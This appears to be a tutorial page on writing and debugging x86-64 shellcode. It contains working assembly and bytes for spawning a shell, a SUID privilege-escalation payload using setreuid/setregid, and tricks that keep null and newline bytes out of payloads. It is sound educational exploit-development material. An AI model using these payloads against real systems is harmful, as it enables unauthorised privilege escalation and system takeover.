Shellcode

Writing and debugging your own shellcode

When you have found a buffer overflow, or any other way to make the program jump to your input, a common exploitation method is to write shellcode. With shellcode, you supply data in the form of machine instructions, so that the code you have written is executed when the program jumps to it.

Shellcode is called "shellcode" because you often write code that gives you an interactive shell. This can be done using the execve("/bin/sh", NULL, NULL) syscall to spawn an sh shell with no arguments or environment variables. There are existing shellcodes people have created for various different architectures and use cases, like the following database:

Big collection of shellcodes made by different people, for many architectures and use cases

While these are often enough, in some cases, you will need to write your own custom shellcode that does exactly what you need. There are many different ways of writing shellcode because it simply involves extracting the bytes as machine code from an existing program.

To have the most control and the shortest shellcode, it is recommended to write it in assembly, but in theory, you could just as well write it in C and extract the machine code from the binary after compiling.

Simple example

We can write a simple execve(pathname, argv[], envp[]) syscall, as explained above, in assembly. We first need the correct syscall number in rax to choose execve. Then we set the arguments, which on x64 go in rdi, rsi and rdx, in that order. The first is the most important, as it is the file to execute. This will be "/bin/sh" in our case, but as it is a char* type it needs to be a pointer to that string. Since we control the shellcode, we can simply include the string in it and reference it relative to the rip register, which points into the middle of our shellcode while it is executing. The whole thing looks something like this:

shellcode.s
.global _start
_start:
.intel_syntax noprefix
        mov rax, 59           # choose which syscall: execve (see x64.syscall.sh)
        lea rdi, [rip+binsh]  # set a *pointer* to the /bin/sh string as 1st argument
        mov rsi, 0            # set 2nd argument (argv[]) to NULL
        mov rdx, 0            # set 3rd argument (envp[]) to NULL
        syscall               # perform the syscall we set up
binsh:
        .string "/bin/sh"     # include the string we referenced

Now that we have the assembly code, we'll need to compile it, and later extract the raw shellcode bytes from that compiled binary. First compile it to a runnable ELF file:

$ gcc -nostdlib -static shellcode.s -o shellcode-elf
$ ./shellcode-elf

This will create a shellcode-elf file that you can run to test out your shellcode, and debug it if something goes wrong. If it seems to work correctly, like giving you a shell in this example, you can extract the .text section which contains the code we wrote, but this time as raw bytes from the binary:

$ objcopy --dump-section .text=shellcode-raw shellcode-elf
$ hd shellcode-raw  # hexdump
00000000  48 c7 c0 3b 00 00 00 48  8d 3d 10 00 00 00 48 c7  |H..;...H.=....H.|
00000010  c6 00 00 00 00 48 c7 c2  00 00 00 00 0f 05 2f 62  |.....H......../b|
00000020  69 6e 2f 73 68 00                                 |in/sh.|
00000026

After that, you will have your shellcode in a shellcode-raw file that you can include in your payload.
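As a small sketch of that last step, the bytes from the hexdump above can be pasted into a script and turned into an escaped string for a payload. The variable names are illustrative and not part of any tool; the displacement check only re-derives the 0x10 offset that is already visible in the dump.

```python
# Raw bytes copied from the `hd shellcode-raw` output above.
shellcode = bytes.fromhex(
    "48c7c03b000000"    # mov rax, 59
    "488d3d10000000"    # lea rdi, [rip+binsh]
    "48c7c600000000"    # mov rsi, 0
    "48c7c200000000"    # mov rdx, 0
    "0f05"              # syscall
    "2f62696e2f736800"  # "/bin/sh" plus terminating null
)

# Escaped form that can be pasted into a C string or a printf command.
escaped = "".join(f"\\x{b:02x}" for b in shellcode)

# The lea starts at offset 7 and is 7 bytes long, so rip points at offset 14
# while it executes. Its 32-bit displacement bridges the gap to the string.
lea_end = 7 + 7
displacement = int.from_bytes(shellcode[10:14], "little")
string_offset = lea_end + displacement

print(len(shellcode), escaped)
print(shellcode[string_offset:])
```

Because the string is addressed relative to rip, the same bytes keep working wherever the payload ends up in memory.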

Debugging shellcode

When the shellcode you created doesn't seem to work correctly, you need to debug it. It's probably some simple mistake, because assembly is hard, but you need to understand what is happening to find it. To get a high-level overview of the syscalls you are executing, running strace is a good option. It runs your program and prints each syscall as it is executed, together with its return value. For example, with a wrong path in the shellcode:

$ strace ./shellcode-elf
execve("./shellcode-elf", ["./shellcode-elf"], 0x7ffdf115bb40 /* 41 vars */) = 0
execve("/bin/wrong", NULL, NULL)        = -1 ENOENT (No such file or directory)
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x40101e} ---
+++ killed by SIGILL +++
Illegal instruction

This method is more useful if you have a combination of multiple syscalls where you want to see the intermediate results. For more detailed analysis like stepping through individual instructions, you can use a real debugger like GDB. Simply run the shellcode in GDB and you can break at the first instruction using the starti command. Here we can examine the next instructions, the state of registers, look at the stack, and much more.

(gdb) starti
Program stopped.
0x0000000000401000 in _start ()
(gdb) x/5i $rip
=> 0x401000 <_start>:      mov    $0x3b,%rax
   0x401007 <_start+7>:    lea    0x10(%rip),%rdi        # 0x40101e <binsh>
   0x40100e <_start+14>:   mov    $0x0,%rsi
   0x401015 <_start+21>:   mov    $0x0,%rdx
   0x40101c <_start+28>:   syscall
(gdb) ni
0x0000000000401007 in _start ()
(gdb) x/5i $rip
=> 0x401007 <_start+7>:    lea    0x10(%rip),%rdi        # 0x40101e <binsh>
   0x40100e <_start+14>:   mov    $0x0,%rsi
   0x401015 <_start+21>:   mov    $0x0,%rdx
   0x40101c <_start+28>:   syscall
   0x40101e <binsh>:       (bad)

In case your shellcode works alone, but not inside your exploit, you can also attach a debugger to the exploited binary to step through everything in that different context, which might reveal differences. An easy way to set a breakpoint at the start of your payload is to include the int3 instruction, which triggers a trace/breakpoint trap in any debugger. You can manually add the \xcc byte it translates to, or simply include the int3 in your assembly source code before compiling (see this video for a full explanation):

(gdb) run
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000000000401001 in _start ()
(gdb) x/5i $rip
=> 0x401001 <_start+1>:    mov    $0x3b,%rax
   0x401008 <_start+8>:    lea    0x10(%rip),%rdi        # 0x40101f <binsh>
   0x40100f <_start+15>:   mov    $0x0,%rsi
   0x401016 <_start+22>:   mov    $0x0,%rdx
   0x40101d <_start+29>:   syscall
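The manual variant can be sketched in a few lines. The helper name `with_breakpoint` is made up for this example; the payload is the execve shellcode from earlier on this page.

```python
INT3 = b"\xcc"  # single-byte encoding of the int3 instruction

# Example payload: the execve shellcode assembled earlier.
shellcode = bytes.fromhex(
    "48c7c03b000000"    # mov rax, 59
    "488d3d10000000"    # lea rdi, [rip+binsh]
    "48c7c600000000"    # mov rsi, 0
    "48c7c200000000"    # mov rdx, 0
    "0f05"              # syscall
    "2f62696e2f736800"  # "/bin/sh" plus terminating null
)

def with_breakpoint(code: bytes) -> bytes:
    """Return the payload with an int3 in front so a debugger stops on entry."""
    return INT3 + code

debug_payload = with_breakpoint(shellcode)
print(debug_payload[:8].hex())
```

Every instruction moves one byte further, as in the GDB listing above, but the rip-relative displacement of the lea stays 0x10 because the string moves along with it. Remember to remove the byte again for the final payload: without a debugger attached, the trap normally kills the process.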

Exploiting SUID binaries

While the shellcode above gives you an interactive sh shell, you might find yourself requiring something more. If you are exploiting a SUID binary where your privileges are elevated, often the goal is to become that user, instead of only spawning a shell as yourself. By default, spawning a shell with execve as above from a SUID binary will not give you the permissions of that user; the shell ends up running as you. Look at the following example:

root@machine $ chown root:root shellcode-elf
root@machine $ chmod +s shellcode-elf
user@machine $ ls -l shellcode-elf
-rwsr-sr-x 1 root root 4784 May 28 11:11 shellcode-elf
user@machine $ ./shellcode-elf
$ id
uid=1001(user) gid=1001(user) groups=1001(user)

This can be unintuitive because the program should execute as root because of the s bit we set in the permissions. However, when we execute the shellcode we are still the same low-privilege user. This is because the setuid bit only changes the effective user ID of the process, while the real user ID stays yours. Many shells (bash, and dash on several distributions) reset the effective ID to the real one at startup when the two differ, which throws the elevation away. We have to complete the elevation ourselves using the setreuid (user) and setregid (group) syscalls to take over this user. Both of these syscalls take two arguments, the "real" and the "effective" ID. We can hardcode all of these to 0 to elevate to root if the SUID binary is owned by root, but in some cases, it will be owned by a different user or group ID.

To make a generic method for this, we can request the current effective IDs and set the real IDs to that value. This will basically be the following two syscalls:

setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());

It will set both the real user ID and the real group ID to the effective ones, allowing you to elevate from any SUID binary to any user, not just root. In assembly, these syscalls would look like this:

shellcode-suid.s
.global _start
_start:
.intel_syntax noprefix
geteuid:
        mov rax, 107
        syscall
setreuid:
        mov rdi, rax  # result from geteuid()
        mov rsi, rax  # result from geteuid()
        mov rax, 113
        syscall       # setreuid(geteuid(), geteuid())
getegid:
        mov rax, 108
        syscall
setregid:
        mov rdi, rax  # result from getegid()
        mov rsi, rax  # result from getegid()
        mov rax, 114
        syscall       # setregid(getegid(), getegid())
execve:
        mov rax, 59
        lea rdi, [rip+binsh]
        mov rsi, 0
        mov rdx, 0
        syscall       # execute "/bin/sh" now that UID and GID are set
binsh:
        .string "/bin/sh"

Compiling this shellcode instead, we can see the permissions are correctly transferred over:

admin@machine $ gcc -nostdlib -static shellcode-suid.s -o shellcode-suid-elf
admin@machine $ chmod +s shellcode-suid-elf
user@machine $ id
uid=1001(user) gid=1001(user) groups=1001(user)
user@machine $ ./shellcode-suid-elf
$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin),1001(user)
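The same two calls can be tried from a high-level language to see what they do to the process IDs. This is only a sketch, assuming a Linux or other Unix system; the function name `become_effective_ids` is made up for the example. Run from a normal, non-SUID process it changes nothing, because the real and effective IDs already match.

```python
import os

def become_effective_ids() -> None:
    """Copy the effective UID/GID into the real IDs, as the shellcode does."""
    euid = os.geteuid()
    egid = os.getegid()
    os.setreuid(euid, euid)   # setreuid(geteuid(), geteuid())
    os.setregid(egid, egid)   # setregid(getegid(), getegid())

become_effective_ids()

# After the calls, the real and effective IDs are identical, so a shell
# started from here has no mismatch to react to.
print(os.getuid(), os.geteuid(), os.getgid(), os.getegid())
```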

Filter Bypass (badchars)

Pretty often, you are limited in your input and thus in what shellcode you can provide. Some bytes or patterns are interpreted specially by the target, which makes the choice of bytes in your shellcode important. Common examples are \0 null bytes, which are often used to end a string, and \n newlines (and others) that might mark the end of input.

Below is a table of problematic bytes in common builtin functions (source):

| Byte | Problematic functions |
| --- | --- |
| 0x00: Null byte (\0) | strcpy |
| 0x0a: Newline (\n) | scanf, gets, getline, fgets |
| 0x0d: Carriage return (\r) | scanf |
| 0x20: Space ( ) | scanf |
| 0x09: Tab (\t) | scanf |
| 0x7f: DEL | protocol-specific (telnet, VT100, etc.) |
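Before sending a payload, it helps to scan it for the bytes that the target treats specially. The following is a minimal sketch. The function name `find_badchars` and the chosen set of forbidden bytes are assumptions for illustration; the payload is the execve shellcode from the start of this page.

```python
def find_badchars(payload: bytes, bad: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte) pairs for every forbidden byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

# The execve shellcode assembled earlier.
shellcode = bytes.fromhex(
    "48c7c03b000000"    # mov rax, 59
    "488d3d10000000"    # lea rdi, [rip+binsh]
    "48c7c600000000"    # mov rsi, 0
    "48c7c200000000"    # mov rdx, 0
    "0f05"              # syscall
    "2f62696e2f736800"  # "/bin/sh" plus terminating null
)

# Hypothetical target: input is read with gets() and later copied with strcpy(),
# so both newlines and null bytes are forbidden.
bad = b"\x00\x0a"

hits = find_badchars(shellcode, bad)
for offset, value in hits:
    print(f"offset {offset:2d}: 0x{value:02x}")
```

For this payload, every hit is a null byte, coming from the zero-padded immediates and the string terminator.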

\n newlines (and others)

When you provide shellcode, often this is done via a command-line input. Many functions that accept user input via STDIN will wait until it is completed with a \n. This means that if you send a newline inside of your payload prematurely, it will end your input and not copy the full shellcode.

The byte value of a newline is 0x0a, or 10 in decimal. If you want to set a value of 10 with a mov instruction into a register, for example, it might encode to 0x0a breaking the payload.

In this case, the easiest solution is often to choose a slightly smaller or larger value that still serves the same purpose. If you do need exactly 10, set the register to a different value first and change it with another instruction right after. For example:

mov rax, 10    # 64-bit syscall number for mprotect()
--------------------
48 c7 c0 0a 00 00 00
         ^^ problem

We can fix this, by first setting rax to 9, and then incrementing it by one to get the same result:

mov rax, 9    # rax = 9
inc rax       # rax = 9+1 = 10
------------------
48 c7 c0 09 00 00 00 48 ff c0
         ^^ safe

Many more small tricks like this exist, for example using add, sub, xor or and. It is a matter of being creative in getting values in the right place.
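The xor variant can be searched for automatically. The sketch below looks for two 32-bit values whose xor gives the wanted constant while neither immediate contains a forbidden byte. The function name `xor_pair` and the search strategy (a key made of one repeated byte) are choices made for this example, not an established tool.

```python
def xor_pair(target: int, bad: bytes):
    """Find 32-bit values (key, masked) with key ^ masked == target,
    where neither little-endian immediate contains a forbidden byte."""
    def clean(value: int) -> bool:
        return not any(b in bad for b in value.to_bytes(4, "little"))

    for k in range(1, 256):
        key = k * 0x01010101          # the same byte repeated four times
        masked = target ^ key
        if clean(key) and clean(masked):
            return key, masked
    return None                       # no pair found with this strategy

# Wanted value 10, with null bytes and newlines forbidden.
key, masked = xor_pair(10, b"\x00\x0a")
print(f"mov eax, {key:#010x}")
print(f"xor eax, {masked:#010x}")
```

Writing to eax clears the upper half of rax on x86-64, so the pair leaves the full register holding the target value.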

\0 null bytes

A very common bad char that you will encounter is the null byte, 0x00. This 0 value is so commonly needed that there are some specific tricks to set zero values.

Firstly, simply clearing a register:

xor rax, rax    # xor'ing a register with itself sets every bit to 0
--------
48 31 c0

sub rax, rax    # subtract from itself, leaving 0
--------
48 29 c0

Instructions that set other values often contain null bytes too, because a small value such as 10 is padded with leading zeros to fill a wider immediate. In most cases, you can eliminate these zeros by using a 32-, 16-, or 8-bit register that matches the size of your value. In a previous example, we were setting rax to 10, and the assembled instruction carried a 4-byte immediate that is sign-extended to the full 64 bits, so that the higher bits are cleared as well (look at all the null bytes).

To solve this, we'll set the 8-bit al register instead (see Registers for more info):

xor rax, rax   # rax may contain anything, so clear everything first
mov al, 10     # set the lowest 8 bits to 10
----------------
48 31 c0 b0 0a
            ^^ no nulls
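The difference between the two encodings comes down to the width of the immediate, which can be reproduced with struct. This sketch only rebuilds the byte sequences shown above; the opcode prefixes are copied from those listings.

```python
import struct

value = 10

imm32 = struct.pack("<i", value)   # 4-byte immediate used by `mov rax, 10`
imm8 = struct.pack("<B", value)    # 1-byte immediate used by `mov al, 10`

wide = bytes.fromhex("48c7c0") + imm32                # mov rax, 10
narrow = bytes.fromhex("4831c0") + b"\xb0" + imm8     # xor rax, rax + mov al, 10

print(wide.hex(" "), "nulls:", wide.count(0))
print(narrow.hex(" "), "nulls:", narrow.count(0))
```

Note that the 0x0a byte itself is still present in the narrow form, so if newlines are also forbidden this needs to be combined with the increment trick from the previous section.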

Lastly, you might need zero-delimited strings that don't perfectly align with the 64, 32, 16, or 8 bits we did previously.

In these cases, either make the string aligned with these boundaries, intentionally ending the payload with the required null byte, or use shifts to get the exact string. Let's say we want the little-endian "/bin/sh" string into the rdi register:

Align with bits:

mov rdi, 0x68732f2f6e69622f  # "/bin//sh", still works as path, but exactly 64 bits
-----------------------------
48 bf 2f 62 69 6e 2f 2f 73 68

Bitshifting:

mov rdi, 0x68732f6e69622fff  # "\xff/bin/sh", the 0xff is a filler byte
shr rdi, 0x8                 # shift right 8 bits to make "/bin/sh" followed by a null

End with null:

_start:
        jmp binsh       # jump forward to the call placed right before the string
back:
        pop rdi         # take the address of "/bin/sh" from the stack
        mov rdi, [rdi]  # dereference pointer to get raw value
        ...
binsh:
        call back       # pushes the address of the next bytes ("/bin/sh") as return address
        .string "/bin/sh"
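The immediates used in the first two variants do not have to be worked out by hand. A short sketch, with the helper name `as_immediate` made up for this example, converts the strings to the little-endian values a register would hold and checks the effect of the shift:

```python
def as_immediate(data: bytes) -> int:
    """Interpret up to 8 bytes as the little-endian value a register would hold."""
    if len(data) > 8:
        raise ValueError("does not fit in a 64-bit register")
    return int.from_bytes(data, "little")

aligned = as_immediate(b"/bin//sh")      # exactly 8 bytes
padded = as_immediate(b"\xff/bin/sh")    # filler byte in the lowest position
shifted = padded >> 8                    # what `shr rdi, 8` leaves in the register

print(hex(aligned))
print(hex(padded))
print(shifted.to_bytes(8, "little"))
```

The shift drops the filler byte and moves a zero in at the top, which becomes the terminating null once the register is written to memory.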
